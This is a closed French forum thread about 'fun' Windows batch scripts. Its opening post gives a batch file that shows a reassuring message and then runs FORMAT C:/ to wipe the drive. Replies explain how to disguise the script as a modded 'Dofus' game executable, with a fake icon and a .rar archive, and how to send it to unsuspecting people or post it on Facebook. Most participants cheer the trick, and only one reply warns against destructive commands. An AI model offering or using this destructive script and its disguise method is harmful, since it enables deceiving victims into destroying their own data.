Quelques trucs amusants en .bat

• Auteur de la discussion Auteur de la discussion Waoh
  • Créé le Créé le
Statut
N'est pas ouverte pour d'autres réponses.
Soyons fou :P
Code:
@echo off
Echo Je vais resoudre tous vos problemes ! :D
FORMAT C:/
Arh arh arh, chi souis diaboliqueuh.

Tu cherche un convertisseur de bat en .exe , tu rename le batch que tu as convertis en .exe en par exemple " Dofus " pour qu'il clique dessus ( tu dit genre que c'est un dofus modded , essaie de trouver une excuse marrante) , puis tu met le dofus.exe ( le faux bien sur) dans un dossier que tu transforme en .rar , tu upload sur internet et tu l'envoie^^

Tu cherche un convertisseur de bat en .exe , tu rename le batch que tu as convertis en .exe en par exemple " Dofus " pour qu'il clique dessus ( tu dit genre que c'est un dofus modded , essaie de trouver une excuse marrante) , puis tu met le dofus.exe ( le faux bien sur) dans un dossier que tu transforme en .rar , tu upload sur internet et tu l'envoie^^
Pour que ça aie lair plus vrai crée un raccourci du .bat et tu mets une icone en faisant Clic droit sur le raccourci > Raccourci > Changer d'icone et met celle de dofus en séléctionnant le vrai dofus launcher ;)

Sur windows 7 c'est pas pareil que XP comment vous modifiez le format ?

quand je le mais en .exe puis .rar quand on l'ouvre il y'a un message de sécuriter et safait quitter le fichier :(

Jusqu'à maintenant j'ai jamais fais pire qu'ouvrir la calculatrice à l'infini ou éteindre l'ordi ! Mais maintenant ca va changer !!! Mouahahahahaha :evil:

Merci du partage :)

Connue ;) tu poste sa sur fb et voila les blaireaux XD

Merci Waa :D

Bof il y a mieux comme .bat !

Connu merci :)

Vous devriez prevenir de ne pas le faire de DEL ou FORMAT C:/ , ça se fait pas imaginez quelqu'un test et il connait pas :mdr:

Bof il y a mieux comme .bat !
Oui c'est sur que maintenant ya beaucoup mieux , même moi j'arrive a faire beaucoup plus puissant et beaucoup plus marrant , quand j'aurais le temps j'éditerais un peu ce vieux topic merci :D

Statut
N'est pas ouverte pour d'autres réponses.
Retour